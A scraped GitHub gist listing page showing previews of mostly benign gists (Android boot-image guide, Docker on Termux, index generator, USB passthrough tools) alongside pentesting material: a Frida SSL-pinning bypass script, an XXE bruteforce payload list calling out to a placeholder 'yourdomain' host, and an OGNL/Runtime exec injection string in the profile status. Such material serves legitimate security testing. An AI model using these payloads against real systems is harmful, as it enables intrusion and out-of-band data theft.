Skip to content

Instantly share code, notes, and snippets.

View schniggie's full-sized avatar
๐Ÿ’ฃ
/${@๐š“๐šŠ๐šŸ๐šŠ.๐š•๐šŠ๐š—๐š.๐š๐šž๐š—๐š๐š’๐š–๐šŽ@๐š๐šŽ๐š๐š๐šž๐š—๐š๐š’๐š–๐šŽ().๐šŽ๐šก๐šŽ๐šŒ("๐š†๐šƒ๐™ต ๐™ฐ๐š๐š•๐šŠ๐šœ๐šœ๐š’๐šŠ๐š—")}/

แ„ƒฮ‰ะฏIฦงฦฌำจPฮ‰ฮฃะฏ (Bแ„‚ฮฃแ„ƒKMฮ›ะŸะŸ-)Dะฏฮฃฮ‰ฮฃะฏ schniggie

๐Ÿ’ฃ
/${@๐š“๐šŠ๐šŸ๐šŠ.๐š•๐šŠ๐š—๐š.๐š๐šž๐š—๐š๐š’๐š–๐šŽ@๐š๐šŽ๐š๐š๐šž๐š—๐š๐š’๐š–๐šŽ().๐šŽ๐šก๐šŽ๐šŒ("๐š†๐šƒ๐™ต ๐™ฐ๐š๐š•๐šŠ๐šœ๐šœ๐š’๐šŠ๐š—")}/
View GitHub Profile
@gitclone-url
gitclone-url / Boot image extraction guide.md
Last active May 5, 2025 07:19
Guide on how to extract boot image from any android phone without needing to root using magisk and without custom recovery.

Boot Image Extraction Guide

Guide on how to extract a boot image from any Android phone without needing to root using Magisk and without a custom recovery.

Most Android users face hurdles when attempting to root their phones because they require a boot image for patching, and custom recoveries specifically designed for their devices are often unavailable. Additionally, finding the phone firmware online can be challenging. As a result, rooting such phones becomes a daunting task. In this guide, I'll provide a comprehensive solution for users who want to extract the boot image from their phone without the need to root it first, download firmware from the internet, or rely on custom recoveries.

Getting started!

Before diving into the guide, please thoroughly review the Frequently Asked Questions (FAQ) to understand the basics of GSI and the various naming conventi

@incogbyte
incogbyte / mixunpin.js
Last active April 21, 2025 03:21
Frida script to bypass common methods of sslpining Android
console.log("[*] SSL Pinning Bypasses");
console.log(`[*] Your frida version: ${Frida.version}`);
console.log(`[*] Your script runtime: ${Script.runtime}`);
/**
* by incogbyte
* Common functions
* thx apkunpacker, NVISOsecurity, TheDauntless
* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that.
* !!! THIS SCRIPT IS NOT A SILVER BULLET !!
'''
Based on the initial work of Digininja at https://github.com/digininja/CeWL. While CeWL is a script written
in Ruby that requires an independent crawl of a website in order to build a custom wordlist, Whey CeWLer
runs within Portswigger's Burp Suite and parses an already crawled sitemap to build a custom wordlist. It
does not have the meta data parsing capabilities that CeWL does, but it more than makes up for it in
convenience.
The name gets its origins from the CeWLer portion of the CO2 Burp extension by Jason Gillam, which is written
in Java and does something similar, but Whey CeWLer is a completely reimagined extension written in Python,
making it "way cooler".
@FreddieOliveira
FreddieOliveira / docker.md
Last active May 9, 2025 16:53
This tutorial shows how to run docker natively on Android, without VMs and chroot.

Docker on Android ๐Ÿ‹๐Ÿ“ฑ

Edit ๐ŸŽ‰

All packages, except for Tini have been added to termux-root. To install them, simply pkg install root-repo && pkg install docker. This will install the whole docker suite, left only Tini to be compiled manually.


Summary

@coaxial
coaxial / README.md
Last active April 27, 2025 16:49
unpinning SSL certs on Android apps with Frida to inspect network traffic with mitmproxy

Most of the time, applications won't pin the certificate. Running mitmproxy and passing all Android traffic through it is as simple as adb connect <IP> && adb shell settings put global http_proxy <mitmproxy host>:<mitmproxy port> (or use Android's UI)

Some applications, however, pin the certificate and will refuse to do any network calls if using mitmproxy.

Luckily, Frida is here!

This assumes Android x86 is running in a VM, that you are a developer in Android (tap the build version enough times), adb debugging is enabled, and that android tools are installed on the host.

  • start mitmproxy on host
  • visit mitm.it on the target (after setting the proxy) and install the spoofed cert
@honoki
honoki / xxe-payloads.txt
Last active November 11, 2024 17:01
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@oofnikj
oofnikj / answerfile
Last active May 6, 2025 17:44
Install Docker on Termux
KEYMAPOPTS="us us"
HOSTNAMEOPTS="-n alpine"
INTERFACESOPTS="auto lo
iface lo inet loopback
auto eth0
iface eth0 inet dhcp
hostname alpine
"
TIMEZONEOPTS="-z UTC"
@glowinthedark
glowinthedark / generate_directory_index_caddystyle.py
Last active April 22, 2025 19:12
Generate directory index (recurse subfolders with `-r` or `--recursive`). Use `-h` or `--help` for all options โ—๏ธsuperseded by https://github.com/glowinthedark/index-html-generator
#!/usr/bin/env python3
# NOTE: this script is deprecated;
# maintained version with SVG icons: https://github.com/glowinthedark/index-html-generator/
# ---
# Copyright 2020 glowinthedark
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
@gpoole
gpoole / README.md
Last active April 5, 2025 14:14
Xen/XCP-ng script to attach physical USB devices via passthrough to a VM

XCP-ng USB passthrough tools

A set of command line tools and a service to make setting up passthrough USB devices easier:

  • add-custom-usb-policies - script to store and apply custom USB policies required for specific devices
  • attach-usb-devices - script and service to automatically connect USB devices to VMS when XCP-ng boots up
  • plug-usb - attach a physical USB device to a VM in one command
  • unplug-usb - remove a physical USB device from a VM in one command

To set up, copy the files onto your server and run install.sh to copy everything and set up the service.

This file has been truncated, but you can view the full file.
www,719407
api,69552
eks,67581
svc,67131
cloudapp,65945
vpn,55659
bastion,53840
ax,40676
dev,38756
operations,35663